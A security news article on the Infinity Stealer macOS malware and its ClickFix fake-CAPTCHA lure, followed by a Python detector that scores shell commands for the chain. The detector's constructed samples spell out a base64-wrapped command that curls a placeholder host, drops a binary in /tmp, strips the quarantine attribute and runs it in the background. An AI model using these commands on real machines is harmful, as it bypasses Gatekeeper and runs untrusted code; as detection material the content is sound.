
New Infinity Stealer Malware Grabs macOS Data via ClickFix Lures
Why It Matters
The campaign demonstrates that macOS, long considered a lower‑risk platform, is now targeted with sophisticated, hard‑to‑detect malware, raising the threat level for enterprise and consumer users alike.
Key Takeaways
- Infinity Stealer ships as a Nuitka-compiled native macOS (Mach-O) binary rather than a PyInstaller bundle.
- The ClickFix lure mimics a Cloudflare CAPTCHA and gets the victim to paste a command into Terminal.
- The 8.6 MB loader unpacks a 35 MB zstd-compressed archive containing the Python-based stealer.
- The stealer harvests browser data, the macOS Keychain, cryptocurrency wallets, and .env files.
- Exfiltration is over HTTP POST, with Telegram bot notifications to the operators.
Pulse Analysis
macOS security has entered a new era of complexity as threat actors adopt advanced tooling previously seen mostly on Windows. Infinity Stealer exemplifies this shift by leveraging Nuitka, an open-source Python-to-C compiler, to produce a genuine native Mach-O binary. Unlike a PyInstaller bundle, which carries extractable Python bytecode, Nuitka output looks like any other compiled macOS executable, so static signatures written for Python-packaged malware miss it. Coupled with a ClickFix lure that imitates Cloudflare's human verification, the malware exploits user trust and the habit of copying terminal commands: because the victim runs the command themselves, no exploit or malicious download prompt is needed to get code execution.
The attack chain is meticulously crafted. A fake CAPTCHA hosted on update-check.com hands the victim a base64-encoded curl command. Pasted into Terminal, it decodes and runs a Bash script that writes an 8.6 MB loader to /tmp, strips the com.apple.quarantine attribute so Gatekeeper never inspects the file, and launches it in the background. The loader unpacks a 35 MB zstd-compressed archive containing the final Python-based stealer. Before stealing data, the payload performs anti-analysis checks to evade sandboxes, then extracts credentials from Chromium-based browsers, Firefox, the macOS Keychain, cryptocurrency wallets, and plaintext secrets in developer files such as .env. Exfiltration occurs over HTTP POST, while a Telegram bot notifies the operators of each successful theft.
For enterprises and security teams, Infinity Stealer underscores the need for heightened vigilance on macOS endpoints. Signature-based tools may miss Nuitka-compiled binaries, so behavioral analytics, strict application allow-lists, and user education become critical. Organizations should enforce policies that block execution of unsigned binaries from temporary locations and monitor Terminal and shell process events for the ClickFix pattern itself: a base64 blob decoded and piped into a shell, a download written under /tmp, and a quarantine attribute removed by hand. As attackers continue to refine macOS-specific toolchains, a layered defense that combines endpoint detection and response (EDR), network traffic inspection, and regular user training will be essential to mitigate this emerging threat.
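The detection the previous two paragraphs describe, as an added example that is not the article's or any vendor's code: it scores shell command lines (from EDR process-creation events, zsh history, or a unified-log feed) against the ClickFix chain of base64 blob, decoded curl, loader under /tmp, quarantine attribute removed, and background launch. It also decodes any base64 blob it finds so the rules run on the hidden stage as well as the pasted one-liner. The rule weights, the threshold, the placeholder hostname in the reserved .invalid TLD, and the sample commands are constructed for this example and are assumptions, not observed indicators.

```python
"""Score shell command lines for the ClickFix -> loader-in-/tmp chain.
Added example; weights, threshold and samples are assumptions."""
import base64
import re

# A run of base64 alphabet long enough to be worth decoding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

# (indicator, weight, pattern). Weights are an illustrative assumption.
RULES = [
    ("base64-decoded-to-shell", 3, re.compile(
        r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b"        # ... | base64 -d | bash
        r"|\b(?:ba|z)?sh\s+-c\b.*base64\s+(?:-d|-D|--decode)\b")),  # bash -c "$(... | base64 -D)"
    ("curl-or-wget-download", 1, re.compile(r"\b(?:curl|wget)\b")),
    ("writes-to-temp", 2, re.compile(r"/(?:private/)?(?:tmp|var/tmp)/\S+")),
    ("quarantine-removed", 3, re.compile(r"\bxattr\b[^;&|]*(?:com\.apple\.quarantine|\s-c\b)")),
    ("background-launch", 1, re.compile(r"\bnohup\b|(?<!&)&\s*(?:$|;)")),
]
THRESHOLD = 6  # assumption: a /tmp drop plus quarantine removal alone should trip it


def decode_layers(cmd, depth=2):
    """Return [cmd] plus every base64 blob inside it that decodes to text,
    recursing a couple of levels because loaders often nest encodings."""
    layers = [cmd]
    if depth == 0:
        return layers
    for m in B64_BLOB.finditer(cmd):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            layers.extend(decode_layers(text, depth - 1))
    return layers


def score_command(cmd):
    """Apply every rule to the command and to everything it decodes to.
    Each indicator counts once no matter how many layers it appears in."""
    layers = decode_layers(cmd)
    hits = {}
    for layer in layers:
        for name, weight, rx in RULES:
            if name not in hits and rx.search(layer):
                hits[name] = weight
    total = sum(hits.values())
    return {
        "score": total,
        "suspicious": total >= THRESHOLD,
        "indicators": sorted(hits),
        "decoded_layers": len(layers) - 1,
    }


def flagged(events):
    """Commands from an event feed that cross the threshold, in order seen."""
    return [cmd for cmd in events if score_command(cmd)["suspicious"]]


# Constructed samples (not captured from the real campaign). The hostname is a
# placeholder; the stage-2 script mirrors the steps the article lists.
STAGE2 = (
    "curl -fsSL https://update-check.invalid/l -o /tmp/.ld && "
    "xattr -d com.apple.quarantine /tmp/.ld && chmod +x /tmp/.ld && "
    "nohup /tmp/.ld >/dev/null 2>&1 &"
)
_B64 = base64.b64encode(STAGE2.encode()).decode()
CLICKFIX_CMD = f"echo {_B64} | base64 -d | bash"
CLICKFIX_VARIANT = f'bash -c "$(echo {_B64} | base64 -D)"'  # BSD base64 spells decode -D
SAMPLE_EVENTS = [
    "brew update && brew upgrade",
    "git clone https://github.com/example/repo.git /tmp/repo",
    "echo aGVsbG8= | base64 -d",
    CLICKFIX_CMD,
    CLICKFIX_VARIANT,
]

if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS:
        r = score_command(cmd)
        tag = "SUSPICIOUS" if r["suspicious"] else "ok        "
        print(f"{tag} score={r['score']:2d} {cmd[:60]}")
```

The decoding step is what matters in practice: the pasted one-liner alone only shows "base64 piped to bash", which is noisy on developer machines, but once the blob is decoded the curl, the /tmp path and the xattr call all surface and the score jumps well past the threshold. A plain `git clone` into /tmp scores 2 and is left alone.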